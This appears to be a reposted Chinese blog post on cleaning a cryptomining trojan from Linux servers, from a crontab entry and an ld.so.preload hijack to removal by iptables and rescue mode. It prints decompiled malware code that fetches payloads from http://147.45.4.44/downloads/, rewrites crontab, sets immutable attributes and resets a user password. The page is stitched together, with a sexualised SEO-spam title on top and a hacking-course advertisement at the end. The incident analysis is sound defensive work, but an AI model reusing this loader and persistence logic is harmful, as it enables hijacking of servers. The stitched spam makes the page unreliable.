核心内容摘要
凝脂如玉,花颜月貌:探寻“白嫩饱满虎白高耸紧致”的东方美韵
自从换了行业岗位大概有
5年没有去研究逆向安全方向了本来以为会跟这个职业再无任何交集没想到今天一次偶然的机会又让我有机会去爽了一把。
最近公司同事一直反馈项目上的系统很卡很卡起初我并没有留意毕竟不是我负责的项目。
但是突然听到同事说卧槽为什么我们CPU占用率高达
9
8%当时下意识以为可能只是程序有BUG导致CPU爆炸但是当我使用top准备去看哪个服务程序给干炸的时候从输出内容来看所有程序加在一起CPU使用率都不足20%那么问题来了剩下的79%的CPU是谁在搞鬼因为太久没接触安全方向以为现在木马还以勒索病毒为主但是公司数据文件并未被加密或收到勒索信息。
然后打开同局域网下另外一台服务器想重新部署下这套系统查看下问题结果发现备用服务器在没任何系统程序的情况下CPU使用率依旧99%突然发现此刻的问题不简单。
此刻我意识到了显然服务器的已经被当成了矿机既然有机会重操旧业那就准备认真分析一波看看到底哪个小可爱在捣乱。
既然正常系统下top无法查看具体系统进程那么就直接上busybox使用busybox工具内的top来查看下具体进程。
但是也没有发现太有价值的进程存在那么只能换个思路打开方式既然已经知道系统里面有挖矿程序那么系统内必然会出现开启启动任务。
那就crontab -l一下reboot /var/log/log /dev/null 2\1 disown得这不就巧了多么明显的违规行为伪装成log文件。
这不妥妥的木马程序先下载下来丢到平台里面分析一波看看都有什么操作。
这里还访问了ld.so.preload这不妥妥的劫持嘛怪不得使用常规的top无法查询到进程本来就想到此结束。
尝试清除了启动项但是保存在打开后发现启动项还存在那么显然后台还有另外的程序在一直监控修改通过使用auditd监听发现二号目标 /usr/bin/log 出现。
继续拷贝下载到本地打开了尘封已经的IDA二话不说直接强行拉进去一顿F5疯狂输出。
结果显然喜闻乐见死循环去执行各种小可爱操作。
while ( 1 ) { check\_and\_start\_ssh(); check\_and\_run\_crontab(); check\_and\_move\_files(); ensure\_user\_exists(systemd); ...... }更新用户密码if ( (unsigned int)password\_needs\_update(systemd, Voidsetdownload.so) ) { printf(zhengzai gengxin mima %s...\\n, systemd); set\_password(systemd, Voidsetdownload.so); }给木马程序文件设置immutable属性if ( file\_exists(/usr/local/lib/sshdD.so) file\_exists(/usr/bin/log) file\_exists(/var/log/log) ) { if ( (int)set\_immutable(/usr/local/lib/sshdD.so) 0 ) fprintf(stderr, cuou: wufadan bahu wejian %s\\n, /usr/local/lib/sshdD.so); ... }更新环境并执行脚本update\_ld\_preload(); if ( file\_exists(/var/log/log) !script\_ran\_4799 ) { run\_script(); script\_ran\_4799 1; }下载木马程序文件if ( !file\_exists(/usr/local/lib/sshdD.so) || !file\_exists(/usr/bin/log) || !file\_exists(/var/log/log) ) { puts(zhegzai chonxin xizai wejian...); ensure\_files(); }远程通过http://
147.
45.
4
44/downloads/ 下载木马程序void ensure\_files() { if ( !file\_exists(/usr/local/lib/sshdD.so) ) { puts(zhengzai xiazai sshdd.so...); download\_file(http://
147.
45.
4
44/downloads/sshdD.so, /usr/local/lib/sshdD.so); set\_executable\_permissions(/usr/local/lib/sshdD.so, 0x1EDu); } if ( !file\_exists(/usr/bin/log) ) { puts(zhengzai xiazai log...); download\_file(http://
147.
45.
4
44/downloads/g7c/log, /usr/bin/log); set\_executable\_permissions(/usr/bin/log, 0x1EDu); } if ( !file\_exists(/var/log/log) ) { puts(zhengzai xiazai script...); download\_file(http://
147.
45.
4
44/downloads/log, /var/log/log); set\_executable\_permissions(/var/log/log, 0x1EDu); } }尝试添加启动项system(crontab -r); v3 fopen(/tmp/crontab\_edit.txt, w); if ( v3 ) { fprintf(v3, reboot %s /dev/null 21 disown\\n, /var/log/log); fclose(v
; system(crontab /tmp/crontab\_edit.txt); } else { perror(cuou: binji crntab shbai); }这样整个木马程序就已经很清晰远程通过http://
147.
45.
4
44/downloads/ 下载木马程序 挖矿木马程序/var/log/log 持续监听木马程序/usr/bin/log 木马动态库:/usr/local/lib/sshdD.so 再通过修改/etc/ld.so.preload 配置文件内容用以加载恶意的动态链接库既然了解了整体的木马流程那么就有了解决方案先使用iptables阻止对该
147.
45.
4
44地址的访问。
sudo iptables -A OUTPUT -d
147.
45.
4
44 -j DROP sudo iptables -L OUTPUT -v -n既然系统中已经预加载了病毒的动态库那么只要使用U盘进入一个临时的系统或者使用。
sudo systemctl rescue进入救援模式(类似Windows的安全模式)下先对木马程序文件修改immutable属性然后删除文件即可。
到这一步基本挖矿程序就已经清除结束然后再top一下看看嗯效果很舒服最后收尾的时候顺便再把用户该删的删除该修改的修改。
因为该系统在工作日还要继续使用所以暂时没法去重新做系统及追查木马。
如果通过漏洞进入服务器剩下的事情就交给运维同事去处理了。
看雪IDaimhack学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。
知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。
广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。
实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。
部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。
360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。
内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。
通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。